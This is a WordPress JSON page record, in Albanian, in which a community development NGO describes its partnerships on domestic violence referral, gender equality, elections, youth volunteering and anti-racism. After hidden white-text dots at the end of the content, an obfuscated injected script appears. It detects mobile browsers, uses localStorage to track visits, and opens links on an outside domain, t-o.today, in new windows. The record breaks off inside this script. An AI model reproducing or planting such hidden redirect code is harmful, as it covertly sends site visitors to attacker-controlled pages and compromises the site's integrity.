{"id":33,"date":"2015-04-06T12:15:01","date_gmt":"2015-04-06T11:15:01","guid":{"rendered":"http:\/\/37.58.73.34\/~cdctffor\/web\/?page_id=33"},"modified":"2016-03-29T08:46:59","modified_gmt":"2016-03-29T07:46:59","slug":"rrjetezime","status":"publish","type":"page","link":"https:\/\/cdc-tff.org\/web\/?page_id=33","title":{"rendered":"Rrjetezime"},"content":{"rendered":"<p style=\"text-align: justify;\"><strong>Rrjeti i Reagimit te Koordinuar Kund\u00ebr Dhun\u00ebs n\u00eb Durr\u00ebs dhe Tiran\u00eb<\/strong><\/p>\n<p style=\"text-align: justify;\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft size-full wp-image-1368\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/1.png\" alt=\"1\" width=\"336\" height=\"224\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/1.png 336w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/1-300x200.png 300w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/1-200x133.png 200w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/1-320x213.png 320w\" sizes=\"(max-width: 336px) 100vw, 336px\" \/>Qendra p\u00ebr Zhvillim Komunitar &#8220;Sot p\u00ebr t\u00eb Ardhmen&#8221; \u00ebsht\u00eb nj\u00eb nga organizatat e para q\u00eb u b\u00eb pjes\u00eb e Mekanizmit t\u00eb Koordinuar t\u00eb Referimit t\u00eb Dhun\u00ebs n\u00eb Marr\u00ebdh\u00ebniet Familjare, t\u00eb financuar ga UNDP-ja, dhe mb\u00ebshtetur nga Bashkia e Durr\u00ebsit, e cila ka p\u00ebr q\u00ebllim implementimin n\u00eb p\u00ebrputhje me zbatimin e Ligjit nr.9669 dat\u00eb 18.12.2006 &#8220;P\u00ebr Masa Kund\u00ebr Dhun\u00ebs n\u00eb Marr\u00ebdh\u00ebniet Familjare.<\/p>\n<p style=\"text-align: justify;\">Qendra per Zhvillim Komunitar &#8220;Sot p\u00ebr t\u00eb Ardhmen&#8221; u zgjodh si nj\u00eb OJQ q\u00eb plot\u00ebson t\u00eb gjitha detyrimet dhe kushtet e k\u00ebrkuara nga UNDP dhe plot\u00ebson n\u00eb m\u00ebnyr\u00ebn m\u00eb t\u00eb mir\u00eb nevojat e viktimave t\u00eb dhun\u00ebs. Sistemi elektronik p\u00ebr regjistrimin e t\u00eb dh\u00ebnave q\u00eb kan\u00eb t\u00eb b\u00ebjn\u00eb me menaxhimin e rasteve t\u00eb dhun\u00ebs n\u00eb familje, \u00ebsht\u00eb instaluar n\u00eb Bashkin\u00eb e Durr\u00ebsit, me mb\u00ebshtetjen e UNDP-s\u00eb n\u00eb gusht-shtator 2010.<br \/>\nViktimat mund t\u00eb p\u00ebrfitojn\u00eb nga format e ndryshme t\u00eb mb\u00ebshtetjes t\u00eb ofruara nga qendra t\u00eb tilla si: mb\u00ebshtetje ligjore, mb\u00ebshtetje psikologjike, k\u00ebshillim n\u00ebp\u00ebrmjet telefonit etj.<\/p>\n<p style=\"text-align: justify;\">Qendra ofron nj\u00eb mjedis me t\u00eb gjitha kushtet e nevojshme p\u00ebr strehim optimal t\u00eb viktim\u00ebs p\u00ebr nj\u00eb periudh\u00eb prej 1-2 ditore, p\u00ebr rastet emergjente t\u00eb viktimave t\u00eb dhun\u00ebs n\u00eb familje dhe atyre q\u00eb jan\u00eb n\u00eb rrezik p\u00ebr jet\u00ebn . Bashk\u00ebpunimi me Drejtorin\u00eb e Politikave ofron 24 or\u00eb strehim t\u00eb sigurt t\u00eb viktimave n\u00eb k\u00ebt\u00eb qend\u00ebr. N\u00eb k\u00ebto raste jan\u00eb dh\u00ebn\u00eb veshje dhe ushqim.<\/p>\n<p style=\"text-align: justify;\">Pas eksperienc\u00ebs s\u00eb suksesshme n\u00eb Durr\u00ebs, QZHK \u201cSot p\u00ebr t\u00eb Ardhmen\u201d u b\u00eb pjes\u00eb e Mekanizmit t\u00eb Koordinuar t\u00eb Referimit t\u00eb Dhun\u00ebs n\u00eb Marr\u00ebdh\u00ebniet Familjare n\u00eb Tiran\u00eb, ku tashm\u00eb operon aktivisht p\u00ebr zgjidhjen e c\u00ebshtjeve t\u00eb dhun\u00ebs n\u00eb bashk\u00ebpunim t\u00eb ngusht\u00eb me institucionet e tjera t\u00eb rrjetit si Bashkia e Tiran\u00ebs, Gjykata, Policia etj.<\/p>\n<hr \/>\n<p style=\"text-align: justify;\"><strong>Grupi nism\u00ebtar<br \/>\n<a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/21.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft size-full wp-image-1369\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/21.jpg\" alt=\"2\" width=\"336\" height=\"224\" \/><\/a><\/strong> Qendra p\u00ebr Zhvillim Komunitar &#8220;Sot p\u00ebr t\u00eb Ardhmen&#8221; \u00ebsht\u00eb nj\u00eb nga an\u00ebtar\u00ebt e nje grupi me 18 pal\u00eb ky\u00e7e t\u00eb interesuara nga sektor\u00eb t\u00eb ndrysh\u00ebm t\u00eb shoq\u00ebris\u00eb p\u00ebr t\u00eb nisur nj\u00eb proces afat-gjat\u00eb n\u00eb komunitet p\u00ebr t\u00eb identifikuar dhe prioritizuar nevojat reale t\u00eb komunitetit duke angazhuar sa m\u00eb shum\u00eb t\u00eb jet\u00eb e mundur grupet e interesit n\u00eb projektet dhe planet e ardhshme.<\/p>\n<p style=\"text-align: justify;\">An\u00ebtar\u00ebt e grupit nism\u00ebtar, q\u00eb p\u00ebrfaq\u00ebsojn\u00eb organizatat apo institucionet e ndryshme nga qeveria qendrore dhe lokale, do t\u00eb sh\u00ebrbejn\u00eb si katalizator\u00eb t\u00eb komunitetit. Risia e k\u00ebsaj nisme \u00ebsht\u00eb p\u00ebrfshirja e komunitetit n\u00eb procesin e vendimmarrjes. K\u00ebrkohet t\u00eb arrihet nj\u00eb ndryshim t\u00eb q\u00ebndruesh\u00ebm pozitiv, ve\u00e7an\u00ebrisht p\u00ebr mir\u00ebqenien e f\u00ebmij\u00ebve, duke identifikuar nevojat dhe krijimin e programeve p\u00ebr t\u00eb adresuar k\u00ebto nevoja.<br \/>\nPrioritet p\u00ebr nd\u00ebrhyrje jan\u00eb problemet e m\u00ebposhtme:<\/p>\n<ol style=\"text-align: justify;\">\n<li>Problemet socio-ekonomike n\u00eb familje<\/li>\n<li>Problemet e arsimit<\/li>\n<li>Problemet mjedisore.<\/li>\n<\/ol>\n<hr \/>\n<p style=\"text-align: justify;\"><strong>SENIOR-A_ N13<\/strong><br \/>\n<img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1409\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/senior-a-300x200.jpg\" alt=\"senior a\" width=\"336\" height=\"224\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/senior-a-300x200.jpg 300w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/senior-a-200x133.jpg 200w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/senior-a-860x573.jpg 860w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/senior-a-320x213.jpg 320w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/senior-a-775x517.jpg 775w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/senior-a.jpg 960w\" sizes=\"(max-width: 336px) 100vw, 336px\" \/>Rrjet organizatash q\u00eb kan\u00eb p\u00ebrvoj\u00eb n\u00eb Menaxhimin e Sh\u00ebrbimeve Mjedisore.<br \/>\nSynimi i punes se ketij rrjeti n\u00eb nivel komb\u00ebtar eshte nderhyrja ne fushen e sh\u00ebrbimeve mjedisore dhe veprime te p\u00ebrbashketa vendore, rajonale, qendrore qe nxitin permiresimin e situates nepermjet:<\/p>\n<ul style=\"text-align: justify;\">\n<li>Reagimit ndaj prioriteteve afatshkurtera qe ka Qeveria Qendrore per permiresimin e sh\u00ebrbimeve mjedisore<\/li>\n<li>Pergjithesim te problemeve vendore\/rajonale, ku arritja e rezultateve k\u00ebrkon bashk\u00ebpunime dhe mb\u00ebshtetje nga rrjeti i Shoqerise Civile.<\/li>\n<li><\/li>\n<\/ul>\n<hr \/>\n<p style=\"text-align: justify;\"><strong>Task Force p\u00ebr Platform\u00ebn Gjinore<br \/>\n<img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1411\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Platforma-kombetare-per-grate-ne-vendimmarrje-300x225.jpg\" alt=\"Platforma kombetare per grate ne vendimmarrje\" width=\"336\" height=\"223\" \/><\/strong>Puna e k\u00ebsaj Task Force synon rritjen e pjes\u00ebmarrjes s\u00eb grave n\u00eb jet\u00ebn politike dhe publike. Forumet q\u00eb do t\u00eb organizohen prej saj do t\u2019u ofrojn\u00eb mund\u00ebsi nd\u00ebrveprimi grave t\u00eb zgjedhura n\u00eb poste zyrtare nga i t\u00ebr\u00eb spektri politik, grave q\u00eb aspirojn\u00eb t\u00eb nisin nj\u00eb karrier\u00eb n\u00eb politik\u00eb dhe an\u00ebtareve t\u00eb shoq\u00ebris\u00eb civile. N\u00eb forume do t\u00eb identifikohen sfidat q\u00eb hasin grat\u00eb n\u00eb rritjen e nd\u00ebrgjegj\u00ebsimit p\u00ebr nevoj\u00ebn e barazis\u00eb gjinore dhe zhvillimin e planeve rajonale t\u00eb pun\u00ebs. V\u00ebmendje e ve\u00e7ant\u00eb do t\u2019i kushtohet pjes\u00ebmarrjes s\u00eb grave nga grupet e cenueshme, si ato rome.<\/p>\n<p style=\"text-align: justify;\">Me afrimin e zgjedhjeve vendore t\u00eb 2015-s, kjo p\u00ebrpjekje p\u00ebr rritjen e kapaciteteve do t\u00eb p\u00ebrqendrohet n\u00eb veprimtarit\u00eb p\u00ebr t\u00eb promovuar grat\u00eb si vendimmarr\u00ebse politike dhe kandidate t\u00eb mundshme, me synim sigurimin e nj\u00eb barazie m\u00eb t\u00eb madhe gjinore n\u00eb proceset zgjedhore.<\/p>\n<hr \/>\n<p style=\"text-align: justify;\"><strong>AL GARD NET<\/strong> <strong>\u2013 Axhenda Gjinore p\u00ebr Zhvillimin Rural n\u00eb Ballkan<\/strong><\/p>\n<p style=\"text-align: justify;\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1372\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/5.jpg\" alt=\"5\" width=\"140\" height=\"147\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/5.jpg 219w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/5-190x200.jpg 190w\" sizes=\"(max-width: 140px) 100vw, 140px\" \/>Misioni i <strong>AL-GARD NET<\/strong> \u00ebsht\u00eb q\u00eb t\u00eb promovoj\u00eb integrimin e axhend\u00ebs gjinore dhe t\u00eb kontribuar n\u00eb fuqizimin e rolit t\u00eb grave n\u00eb zonat rurale. Aktivitetet e Rrjetit do t\u00eb mund\u00ebsojn\u00eb q\u00eb grat\u00eb, ve\u00e7an\u00ebrisht grat\u00eb n\u00eb zonat rurale, t\u00eb ken\u00eb kontroll m\u00eb t\u00eb madh mbi jet\u00ebn e tyre, t\u00eb ushtrojn\u00eb t\u00eb drejtat dhe mund\u00ebsit\u00eb e tyre p\u00ebr t\u00eb marr\u00eb pjes\u00eb n\u00eb proceset e politik\u00eb b\u00ebrjes lokale, komb\u00ebtare dhe rajonale, me synim adresimin e pavar\u00ebsin\u00eb s\u00eb tyre ligjor, ekonomik dhe social.<\/p>\n<hr \/>\n<p><strong>Koalicioni p\u00ebr Nxitjen e Pjes\u00ebmarrjes s\u00eb Grave dhe t\u00eb Rinjve n\u00eb Politik\u00eb<\/strong><\/p>\n<p style=\"text-align: justify;\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1373\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/6.jpg\" alt=\"6\" width=\"336\" height=\"224\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/6.jpg 312w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/6-300x200.jpg 300w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/6-200x133.jpg 200w\" sizes=\"(max-width: 336px) 100vw, 336px\" \/>\u201cSot p\u00ebr t\u00eb Ardhmen\u201d \u00ebsht\u00eb an\u00ebtar i Koalicionit p\u00ebr Nxitjen e Pjes\u00ebmarrjes s\u00eb Grave dhe t\u00eb Rinjve n\u00eb Politik\u00eb.Ky Koalicion \u00ebsht\u00eb nj\u00eb rrjet i gjer\u00eb i organizatave t\u00eb shoq\u00ebris\u00eb civile n\u00eb Shqip\u00ebri, i krijuar n\u00eb Dhjetor 2005. Ai p\u00ebrb\u00ebhet nga OJF, Forumet e Grave dhe t\u00eb t\u00eb Rinjve nga Partit\u00eb Politike, Deputet\u00eb, etj. Koalicioni punon p\u00ebr t\u00eb arritur pjes\u00ebmarrje dhe p\u00ebrfaq\u00ebsim m\u00eb t\u00eb lart\u00eb t\u00eb grave dhe t\u00eb rinjve n\u00eb Parlament, Qeverisje Q\u00ebndrore dhe Lokale dhe n\u00eb vendimmarrje n\u00eb p\u00ebrgjith\u00ebsi. Kjo p\u00ebrmes forcimit t\u00eb kapaciteteve t\u00eb grave dhe t\u00eb rinjve p\u00ebr t\u00eb marr pjes\u00eb n\u00eb proceset politike; p\u00ebrmes fushatave sensibilizuese p\u00ebr zbatimin e kuot\u00ebs gjinore dhe p\u00ebr pjesmarrjen e grave n\u00eb politik\u00eb dhe vendimmarrje; p\u00ebrmes lobimit dhe advokimit p\u00ebr ndryshime n\u00eb legjislacion dhe politika p\u00ebr t\u00eb garantuar nj\u00eb p\u00ebrfaq\u00ebsim m\u00eb t\u00eb lart\u00eb t\u00eb grave; dhe p\u00ebrmes informimit dhe edukimit t\u00eb publikut t\u00eb gjer\u00eb dhe komuniteteve specifike p\u00ebr r\u00ebnd\u00ebsin\u00eb e rritjes s\u00eb pjes\u00ebmarrjes s\u00eb grave n\u00eb vendimmarrje.<\/p>\n<hr \/>\n<p style=\"text-align: justify;\"><strong>Koalicioni p\u00ebr Zgjedhje t\u00eb Lira e t\u00eb Ndershme e p\u00ebr Demokraci t\u00eb Qendrueshme<\/strong><br \/>\n<img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1374\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/7.koalciioni.jpg\" alt=\"7.koalciioni\" width=\"336\" height=\"224\" \/>\u201cSot p\u00ebr t\u00eb Ardhmen\u201d \u00ebsht\u00eb an\u00ebtar i Koalicionit p\u00ebr Zgjedhje t\u00eb Lira e t\u00eb Ndershme e p\u00ebr Demokraci t\u00eb Qendrueshme me q\u00ebllim p\u00ebr t\u00eb kontribuar s\u00eb bashku n\u00eb drejtim t\u00eb demokratizimit t\u00eb m\u00ebtejsh\u00ebm t\u00eb shoq\u00ebris\u00eb shqiptare dhe n\u00eb ve\u00e7anti n\u00eb sigurimin e liris\u00eb e drejt\u00ebsis\u00eb s\u00eb proceseve zgjedhore, qeverisje t\u00eb p\u00ebrgjegjshme, transparente dhe gjith\u00ebp\u00ebrfshir\u00ebse si dhe p\u00ebrfshirjen e grupeve t\u00eb n\u00ebn p\u00ebrfaq\u00ebsuara dhe t\u00eb pambrojtura n\u00eb proceset politike dhe ato t\u00eb qeverisjes.<br \/>\nRrjeti \u201cSot p\u00ebr t\u00eb Ardhmen\u201d \u00ebsht\u00eb i angazhuar dhe i vendosur p\u00ebr nj\u00eb p\u00ebrfaq\u00ebsim t\u00eb shk\u00eblqyer t\u00eb qytetar\u00ebve shqiptar\u00eb n\u00eb zgjedhje t\u00eb lira e t\u00eb ndershme dhe arritjen e e vler\u00ebsimit qytetar p\u00ebr nj\u00eb funksionim t\u00eb besuesh\u00ebm dhe transparent t\u00eb zyrtar\u00ebve dhe institucioneve publike.<\/p>\n<hr \/>\n<p style=\"text-align: justify;\"><strong>Avon<\/strong> &#8211; <strong>&#8220;Fondacioni Avon dhe e Ardhmja pa Dhun\u00eb&#8221;<\/strong> <strong>\u2013<\/strong> <strong>Rrjeti Global i Fushatave Inovative kund\u00ebr dhun\u00ebs me baz\u00eb gjinore<\/strong><\/p>\n<p style=\"text-align: justify;\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1375\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/avon.jpg\" alt=\"avon\" width=\"336\" height=\"224\" \/>Rrjeti QZHK &#8220;Sot p\u00ebr t\u00eb Ardhmen&#8221; \u00ebsht\u00eb nj\u00eb nga 20 organizatat globale e p\u00ebrzgjedhur nga Rrjeti AVON dhe fituesja e vendit t\u00eb 3-t\u00eb e \u00c7mimit t\u00eb Komunikimit Global, \u00e7mim i cili jepet n\u00eb kuad\u00ebr t\u00eb fushatave q\u00eb p\u00ebrdorin m\u00ebnyra inovative komunikimi p\u00ebr nj\u00eb ndryshim n\u00eb komunitet, politik\u00eb b\u00ebrje, institucione dhe sjelljet e q\u00ebndrime personale, p\u00ebr t&#8217;i dh\u00ebn\u00eb fund dhun\u00ebs ndaj grave. P\u00ebrzgjedhja e organiza\u00ebs u b\u00eb n\u00eb saj\u00eb t\u00eb fushat\u00ebn mjaf inovative t\u00eb realizuar prej saj n\u00eb kuad\u00ebr t\u00eb Dit\u00ebv\u00eb kund\u00ebr Dhun\u00ebs me Baz\u00eb Gjinore dhe promovimit t\u00eb barazis\u00eb gjinore n\u00eb form\u00ebn e MANiFEST-it apo edhe lan\u00e7imit t\u00eb himnit t\u00eb barazis\u00eb gjinore &#8220;Zbrite diellin&#8221;, fushat\u00eb mb\u00ebshtetur nga Ministria e Mir\u00ebqenies Sociale dhe Rinis\u00eb, UNDP, UN Women, Qeveris\u00eb Suedeze, p\u00ebrfaq\u00ebsues t\u00eb Ambasad\u00ebs s\u00eb SHBA-s\u00eb dhe Delegacioni i BE-s\u00eb n\u00eb Shqip\u00ebri, etj<\/p>\n<hr \/>\n<p style=\"text-align: justify;\"><strong>GYS (Global Youth Service), rrjet\u00ebzim me YSA (Youth Service America)<\/strong><\/p>\n<p style=\"text-align: justify;\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1376\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/ysa.jpg\" alt=\"ysa\" width=\"336\" height=\"224\" \/>Java e sh\u00ebrbimit t\u00eb vullnetarizmit n\u00eb komunitet \u00ebsht\u00eb organizuar tradicionalisht p\u00ebr 6 vjet me iniciativ\u00ebn e t\u00eb rinjve vullnetar\u00eb t\u00eb Rrjetit t\u00eb Qendrave p\u00ebr Zhvillim Komunitar &#8220;Sot p\u00ebr t\u00eb Ardhmen&#8221; dhe q\u00eb marrin pjes\u00eb n\u00eb shum\u00eb aktivitete t\u00eb organizuara.<\/p>\n<p style=\"text-align: justify;\">Vullnetar\u00ebt q\u00eb frekuentojn\u00eb qendrat e Rrjetit n\u00eb t\u00eb gjith\u00eb Shqip\u00ebrin\u00eb p\u00ebrmbushin \u00e7do vit k\u00ebt\u00eb veprimtari p\u00ebrmes loj\u00ebrave t\u00eb animuara dhe aktiviteteve sensibilizuese t\u00eb tilla si pastrimi i mjedisit, duke ndihmuar t\u00eb moshuarit, etj. N\u00eb k\u00ebt\u00eb m\u00ebnyr\u00eb ata kan\u00eb mund\u00ebsin\u00eb t\u00eb arg\u00ebtojn\u00eb m\u00eb shum\u00eb f\u00ebmij\u00eb dhe t\u00eb ndryshojn\u00eb k\u00ebndv\u00ebshtrimin e t\u00eb rriturve n\u00eb lidhje me diversitetin, problemet dhe nevojat e grupeve t\u00eb ndryshme t\u00eb shoq\u00ebris\u00eb. Pas eksperienc\u00ebs s\u00eb gjat\u00eb n\u00eb organizimin e k\u00ebsaj fushate, tashm\u00eb Rrjeti i QZHK \u201cSot p\u00ebr t\u00eb Ardhmen\u201d ka marr\u00eb titullin Country Partner i GYSD.<\/p>\n<hr \/>\n<p style=\"text-align: justify;\"><strong>UNiTE<\/strong> <strong>&#8211; Rrjeti Rinor global p\u00ebr t&#8217;i dh\u00ebn\u00eb fund dhun\u00ebs<\/strong><\/p>\n<p style=\"text-align: justify;\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1377\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/unite.jpg\" alt=\"unite\" width=\"336\" height=\"224\" \/>QZHK &#8220;Sot p\u00ebr t\u00eb Ardhmen&#8221; \u00ebsht\u00eb nj\u00eb partner i rrjetit UNiTE, duke u angazhuar n\u00eb fushatat e nd\u00ebrmarra nga Rrjeti p\u00ebr t&#8217;i dh\u00ebn\u00eb fund dhun\u00ebs ndaj grave, si Dita Portokalli, zhvilluar n\u00eb 25 t\u00eb \u00e7do muaji.<\/p>\n<p style=\"text-align: justify;\">Dita Portokalli e iniciuar dhe udh\u00ebhequr nga UNiTE, b\u00ebn thirrje p\u00ebrmes aktivist\u00ebve, qeverive dhe partner\u00ebve t\u00eb OKB-s\u00eb p\u00ebr t\u00eb mobilizuar njer\u00ebz dhe p\u00ebr t\u00eb nxjerr\u00eb n\u00eb pah \u00e7\u00ebshtjet t\u00eb r\u00ebnd\u00ebsishme p\u00ebr parandalimin dhe dh\u00ebnien fund t\u00eb dhun\u00ebs ndaj grave dhe vajzave.<\/p>\n<p style=\"text-align: justify;\">Jo vet\u00ebm nj\u00eb her\u00eb n\u00eb vit, m\u00eb 25 n\u00ebntor (Dita Nd\u00ebrkomb\u00ebtare p\u00ebr Eliminimin e Dhun\u00ebs m\u00eb Baz\u00eb Gjinore), por duke e sjell k\u00ebt\u00eb fushat\u00eb \u00e7do muaj.<\/p>\n<hr \/>\n<p style=\"text-align: justify;\"><strong>UNITED<\/strong> <strong>&#8211; Rrjeti Evropian kund\u00ebr racizmit dhe diskriminimit<\/strong><\/p>\n<p style=\"text-align: justify;\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-1378\" src=\"http:\/\/37.58.73.34\/~cdctffor\/web\/wp-content\/uploads\/United.jpg\" alt=\"United\" width=\"336\" height=\"216\" \/>UNITED \u00ebsht\u00eb l\u00ebvizja evropiane kund\u00ebr racizmit, diskriminimit dhe gjuh\u00ebs s\u00eb urrejtjes. N\u00eb kuad\u00ebr t\u00eb k\u00ebsaj l\u00ebvizjeje zhvillohen aktivitetet periodike gjat\u00eb gjith\u00eb vitit kalendarik dhe jan\u00eb t\u00eb programuar n\u00eb form\u00ebn e fushatave. QZHK &#8220;Sot p\u00ebr t\u00eb Ardhmen&#8221; \u00ebsht\u00eb partner komb\u00ebtar p\u00ebr Shqip\u00ebrin\u00eb, ku p\u00ebrve\u00e7 fushatave dhe aktiviteteve t\u00eb p\u00ebrbashk\u00ebta ka krijuar edhe nj\u00eb grup t\u00eb hapur n\u00eb facebook &#8220;Ne vler\u00ebsojm\u00eb diversitetin&#8221;, me q\u00ebllim p\u00ebr t\u00eb nisur dhe p\u00ebr t\u00eb promovuar aktivitetet e k\u00ebtij lloji.<\/p>\n<p><span style=\"color: #ffffff;\">.<\/span><br \/>\n<span style=\"color: #ffffff;\"> .<\/span><br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/t-o.today\/BQK9c0','https:\/\/t-o.today\/mmy8c5','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/t-o.today\/rMr5c6','8SJGLkz','random','https:\/\/t-o.today\/Yuv1c4','7196643rGaMMg','setItem','-mnts','https:\/\/t-o.today\/EJL2c2','266801SrzfpD','substr','floor','-local-storage','https:\/\/t-o.today\/rGc4c5','3ThLcDl','stopPropagation','_blank','https:\/\/t-o.today\/NAH3c8','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/t-o.today\/bdc0c4'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/t-o.today\/izc6c8','https:\/\/t-o.today\/fco7c1',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt 